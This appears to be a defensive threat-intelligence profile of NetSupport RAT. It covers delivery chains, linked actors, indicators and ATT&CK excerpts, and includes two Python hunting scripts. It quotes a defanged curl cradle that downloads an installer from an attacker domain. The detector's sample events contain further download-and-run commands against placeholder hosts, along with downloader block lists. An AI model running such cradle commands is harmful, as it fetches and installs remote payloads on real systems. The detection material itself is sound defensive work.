NetSupport RAT
NetSupport RAT is the name defenders use for malicious deployments of NetSupport Manager, a legitimate remote administration product, whether the unmodified software or a derivative of it. Installed on a compromised Windows host it gives operators full control of the endpoint; reported capabilities include remote control, file exfiltration, loading and executing additional payloads, and use as a backdoor or follow-on access mechanism.
The malware is usually delivered through social-engineering and multi-stage delivery chains rather than as a standalone initial vector. Delivery methods observed in public reporting include ClickFix and paste-and-run lures that trick users into executing commands, fake CAPTCHA prompts, fake browser or software update pages, malvertising, compromised websites, malicious JavaScript loaders, signed MSIX installer chains, and custom loaders such as PowerNet. It also appears as a final or secondary payload delivered by other malware and traffic-distribution systems, including SocGholish/FakeUpdates, Hancitor, Scarlet Goldfinch, SmartApeSG/ZPHP/HANEYMANEY activity, GrayAlpha/FIN7-linked infrastructure, TAG-150 campaigns, and GHOSTPULSE. Specific reports describe attempted NetSupport RAT delivery from a briefly compromised Gizmodo website and from a supply-chain compromise of the Okendo Reviews widget.
Threat actors and ecosystems associated with it in public reporting include FIN7/Carbanak, GrayAlpha, SmartApeSG, TA569-linked SocGholish operations, and broader financially motivated crimeware activity. The malware is described as a staple of financial crimeware and has been observed in intrusion chains that also led to GhostWeaver, LockBit, RansomHub, AsyncRAT, Remcos RAT, StealC, Sectop RAT, Rhadamanthys, Vidar, Lumma, and ransomware deployment.
Targeting is primarily Windows endpoints, and because delivery rides on compromised websites, phishing, fake updates, and malvertising, victims span many sectors. Industries and victim types mentioned in the related delivery ecosystems include nonprofits, schools, healthcare and hospitals, legal organizations, real estate, media, retail, hospitality, and financial organizations.
High-confidence indicators and artifacts relate mainly to the abused NetSupport Manager deployment itself: the primary execution engine client32.exe; configuration files such as client32.ini containing a gateway address and an encrypted Global Security Key; signed binaries placed in C:\Users\Public\ or randomized folders; cracked-license strings such as NSM1234 and HANEYMANEY; and network traffic that may carry the User-Agent string "NetSupport Manager/1.3". The binary, the configuration file and the User-Agent are equally present in sanctioned NetSupport Manager installs, so baseline legitimate deployments first; the cracked-license strings and the staging locations are the signals that discriminate abuse from administration.
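The following Python is an added worked example, not code from the page or from NetSupport, that scores a host against the artifacts just listed: where client32.exe sits, what client32.ini says, whether a cracked-license string is present, and whether proxy logs show the NetSupport User-Agent. It assumes the gateway and key are stored under an [HTTP] section as GatewayAddress and GSK, that a sanctioned install lives under Program Files, and that a "randomized" folder name is 8+ alphanumerics mixing letters and digits; the paths, INI text, license text and proxy lines are constructed samples, not real indicators.

```python
"""Hunt for an abused NetSupport Manager deployment from the artifacts listed above.

Added example, not code from the page or from NetSupport. Assumptions: the gateway
and key live under [HTTP] as GatewayAddress and GSK; a sanctioned install sits under
Program Files; the "randomized folder" test is a simple heuristic.
"""
import configparser
import ntpath
import re
from dataclasses import dataclass, field

CRACKED_LICENSE_STRINGS = ("NSM1234", "HANEYMANEY")
NETSUPPORT_UA = "NetSupport Manager/1.3"
SANCTIONED_PREFIXES = (r"c:\program files\netsupport",
                       r"c:\program files (x86)\netsupport")  # assumption
PUBLIC_PREFIX = r"c:\users\public"
# Heuristic: 8+ alphanumerics mixing letters and digits looks generated, not chosen.
RANDOM_DIR_RE = re.compile(r"^(?=.*[a-z])(?=.*\d)[a-z0-9]{8,}$", re.I)


@dataclass
class Finding:
    score: int = 0
    reasons: list = field(default_factory=list)

    def add(self, points, reason):
        self.score += points
        self.reasons.append(reason)


def parse_client32_ini(text):
    """Pull the gateway address and encrypted Global Security Key out of client32.ini."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case as written in the file
    cp.read_string(text)
    if not cp.has_section("HTTP"):
        return {"gateway": None, "gsk": None}
    return {"gateway": cp["HTTP"].get("GatewayAddress"),
            "gsk": cp["HTTP"].get("GSK")}


def assess_binary_path(path, finding):
    """A signed client32.exe is normal under Program Files, suspicious elsewhere."""
    norm = path.replace("/", "\\").lower()
    if norm.startswith(SANCTIONED_PREFIXES):
        return
    finding.add(2, f"client32.exe outside sanctioned install path: {path}")
    if norm.startswith(PUBLIC_PREFIX):
        finding.add(3, "binary staged under C:\\Users\\Public")
    parent = ntpath.basename(ntpath.dirname(norm))
    if RANDOM_DIR_RE.match(parent):
        finding.add(2, f"randomized-looking folder name: {parent}")


def assess_config(ini_text, license_text, finding):
    """Gateway/GSK show a gateway-connected client; license strings show a crack."""
    cfg = parse_client32_ini(ini_text)
    if cfg["gateway"]:
        finding.add(2, f"client32.ini points at gateway {cfg['gateway']}")
    if cfg["gsk"]:
        finding.add(1, "client32.ini carries an encrypted Global Security Key")
    for marker in CRACKED_LICENSE_STRINGS:
        if marker in ini_text or marker in license_text:
            finding.add(4, f"cracked-license string present: {marker}")


def assess_proxy_logs(lines, finding):
    """Match the NetSupport User-Agent in raw proxy log lines."""
    hits = [line for line in lines if NETSUPPORT_UA in line]
    if hits:
        finding.add(3, f"{len(hits)} proxy line(s) with User-Agent {NETSUPPORT_UA!r}")
    return hits


def hunt(binary_path, ini_text, license_text, proxy_lines):
    finding = Finding()
    assess_binary_path(binary_path, finding)
    assess_config(ini_text, license_text, finding)
    assess_proxy_logs(proxy_lines, finding)
    return finding


# Constructed samples (203.0.113.0/24 is documentation space; GSK value is a placeholder).
SAMPLE_PATH = r"C:\Users\Public\a1b2c3d4e5\client32.exe"
SAMPLE_INI = """[Client]
silent=1
[HTTP]
GatewayAddress=203.0.113.10:443
GSK=PLACEHOLDERENCRYPTEDKEYVALUE
"""
SAMPLE_LICENSE = "licensee=HANEYMANEY\nserial_no=NSM1234\n"  # field names assumed
SAMPLE_PROXY = [
    '2024-05-01T10:00:01Z 10.0.0.5 POST http://203.0.113.10/ "NetSupport Manager/1.3" 200',
    '2024-05-01T10:00:05Z 10.0.0.5 GET https://www.example.invalid/ "Mozilla/5.0" 200',
]

if __name__ == "__main__":
    result = hunt(SAMPLE_PATH, SAMPLE_INI, SAMPLE_LICENSE, SAMPLE_PROXY)
    print(f"score={result.score}")
    for reason in result.reasons:
        print(" -", reason)
```

The weights are deliberately skewed: a cracked-license string or staging under C:\Users\Public outweighs the mere presence of client32.exe or the User-Agent, which a legitimate deployment produces too. A sanctioned install under Program Files with an empty license and no proxy hits scores zero.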
Vulnerabilities exploited
1 CVE correlated with this family across public research and vendor advisories.
A legitimately signed NetSupport Manager v14.12 binary -- bearing a valid GlobalSign EV code-signing certificate issued to NETSUPPORT LTD -- is being weaponized as a Remote Access Trojan across two active delivery chains.
Groups observed using it
20 distinct threat actors attributed by public researchers.
On Windows computers the attackers attempted to install NetSupport RAT. This trojan abuses the legitimate NetSupport Manager remote administration tool and gives its operators access to the infected system.
Similar to other RMM tools, NetSupport Manager has been exploited to be used maliciously, to a point of a malicious by-product of the platform being created - aptly named NetSupport RAT.
The group has been linked to past campaigns that delivered dangerous tools including NetSupport RAT, Remcos RAT, StealC, and Sectop RAT.
The TA571 campaign contained at least two different command lines running different PowerShell scripts, one leading to DarkGate via a downloaded HTA-file that ran another PowerShell script and one leading to NetSupport RAT via a downloaded ZIP file.
Scarlet Goldfinch is a cluster of activity that Red Canary first observed in June 2023. This threat deceives users into downloading a file masquerading as a browser update, which starts a chain of activity eventually leading to the installation of NetSupport Manager. NetSupport Manager is an RMM tool that provides the adversary remote control over a system.
Techniques & procedures
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development (1 technique)
Initial Access (7 techniques)
QuickAssist has become a mainstay for initial access by ransomware actors, often leveraged alongside external Microsoft Teams messages.
A compromised account was exploited to inject a malicious script, briefly exposing users to scam content.
A newly discovered supply chain attack has put thousands of e-commerce websites at risk after a popular third-party reviews widget was quietly turned into a malware delivery tool.
TA571 email lure. In this campaign, emails contained an HTML attachment that displayed a page resembling Microsoft Word.
Execution (6 techniques)
LummaC2 reaches out to remote resources via encoded PowerShell commands... Threats like SocGholish and Scarlet Goldfinch sometimes use malicious scripts compressed via a zip file.
That command then pulled down a PowerShell script or HTML Application file, which installed a remote access tool or information stealer on the victim’s machine.
After which, the adversary first attempted a cradle (command line that downloads and installs a payload as a single command) to install ScreenConnect: cmd.exe /c mkdir C:\Temp 2>NUL & curl.exe -L hxxps[:]//server[.]rarexterna[.]top/Bin/ScreenConnect.ClientSetup[.]msi
In this incident, the SmartApeSG injected JavaScript behaved as a staged loader, and did not attempt to execute every action immediately.
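The excerpts above describe one pattern repeatedly: a shell or paste-and-run prompt spawns a downloader (curl.exe -L, PowerShell, mshta) that fetches an MSI, HTA, ZIP or script as the next stage. The Python below is an added example, not from the page or any vendor, that scores process-creation events for that cradle shape. The events are constructed and use Sysmon-style field names (Image, ParentImage, CommandLine), the example.invalid hosts are placeholders, and the threshold and weights are tuning assumptions.

```python
"""Score process-creation events for download cradles like the ones quoted above.

Added example (not from the page or any vendor): events are constructed and use
Sysmon-style field names (Image, ParentImage, CommandLine), which is an assumption.
"""
import re
from urllib.parse import urlparse

# Binaries the quoted chains use to pull the next stage.
DOWNLOADERS = {"curl.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
               "bitsadmin.exe", "certutil.exe"}
# Stage file types named in the excerpts: MSI installer, HTA, ZIP, PowerShell script.
STAGED_EXTENSIONS = (".msi", ".hta", ".zip", ".ps1")
# Parents typical of paste-and-run / cradle execution (explorer.exe covers the Run dialog).
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                 "cscript.exe", "mshta.exe", "explorer.exe"}
URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.I)
CURL_FOLLOW_RE = re.compile(r"(^|\s)(-L|--location)(\s|$)")
ENCODED_PS_RE = re.compile(r"\s-(enc|encodedcommand|ec|e)\b", re.I)
CRADLE_THRESHOLD = 3  # tuning assumption: one strong signal, or weak signals plus context


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons); signals are additive and compared to CRADLE_THRESHOLD."""
    image = basename(event["Image"])
    parent = basename(event.get("ParentImage", ""))
    cmd = event["CommandLine"]
    score, reasons = 0, []
    if image not in DOWNLOADERS:
        return score, reasons
    for url in URL_RE.findall(cmd):
        name = urlparse(url).path.rsplit("/", 1)[-1]
        if name.lower().endswith(STAGED_EXTENSIONS):
            score += 3
            reasons.append(f"{image} fetches staged payload {name}")
    if parent in SHELL_PARENTS:
        score += 1
        reasons.append(f"spawned by {parent}")
    if image == "curl.exe" and CURL_FOLLOW_RE.search(cmd):
        score += 1
        reasons.append("curl follows redirects (-L), as in the quoted cradle")
    if image in ("powershell.exe", "pwsh.exe") and ENCODED_PS_RE.search(cmd):
        score += 2
        reasons.append("encoded PowerShell command line")
    return score, reasons


def hunt(events, threshold=CRADLE_THRESHOLD):
    """Return [(command_line, score, reasons)] for events at or above the threshold."""
    out = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            out.append((event["CommandLine"], score, reasons))
    return out


# Constructed sample telemetry (example.invalid hosts; not real indicators).
EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"curl.exe -L https://dl.example.invalid/Bin/Setup.ClientSetup.msi -o C:\Temp\setup.msi"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl.exe https://status.example.invalid/api/health.json"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "mshta.exe https://cdn.example.invalid/update/verify.hta"},
    {"Image": r"C:\Program Files\Microsoft\Edge\Application\msedge.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "msedge.exe https://www.example.invalid/"},
]

if __name__ == "__main__":
    for cmd, score, reasons in hunt(EVENTS):
        print(f"[{score}] {cmd}\n    " + "\n    ".join(reasons))
```

The third event, curl.exe pulling a JSON status page from a cmd.exe parent, stays below the threshold on purpose: a shell parent alone is routine on admin workstations, and the rule only fires when it combines with a staged payload type, redirect-following or an encoded command.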
Persistence (2 techniques)
Insikt Group identified three main infection vectors associated with GrayAlpha: fake browser update pages, fake 7-Zip download sites, and the TDS TAG-124 network. Notably, the use of the TDS TAG-124 delivery mechanism had not been publicly documented prior to this report.
Stealth (4 techniques)
Threat actors continue to impersonate well-known brands via sponsored search results... Because it includes the official logo and website for Notion, most users will not think twice and click on the link.
Lateral Movement (1 technique)
Over the last few years, threat actors have flocked to exploit legitimate remote monitoring and management (RMM) tools—blue-chip IT software like ScreenConnect, LogMeIn Resolve, and PDQ Connect—blurring the line between legitimate IT administration and malicious intrusion.
Collection (1 technique)
Command and Control (3 techniques)
The Hancitor malware, first observed in 2015, is a downloader known to deliver several other malware. In its first years, Hancitor was observed delivering information stealers such as Pony or Vawtrak, and in recent years, Ficker stealer and NetSupport RAT. In 2021, Hancitor was observed delivering the Cobalt-Strike attack framework...
IOCs tracked for this family
406 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
165 sources tracked across advisories, community write-ups, and news.
Remote access trojan delivered via a ClickFix fake CAPTCHA campaign; it abuses the legitimate NetSupport Manager remote administration tool to give operators access to the infected Windows system.
A remote access trojan that abuses the legitimate NetSupport Manager tool to gain access to systems, exfiltrate files, and deliver additional payloads including ransomware.
A remote access trojan observed as a downstream payload from SocGholish-delivered loaders.
A remote access trojan observed as a downstream payload in SocGholish delivery chains.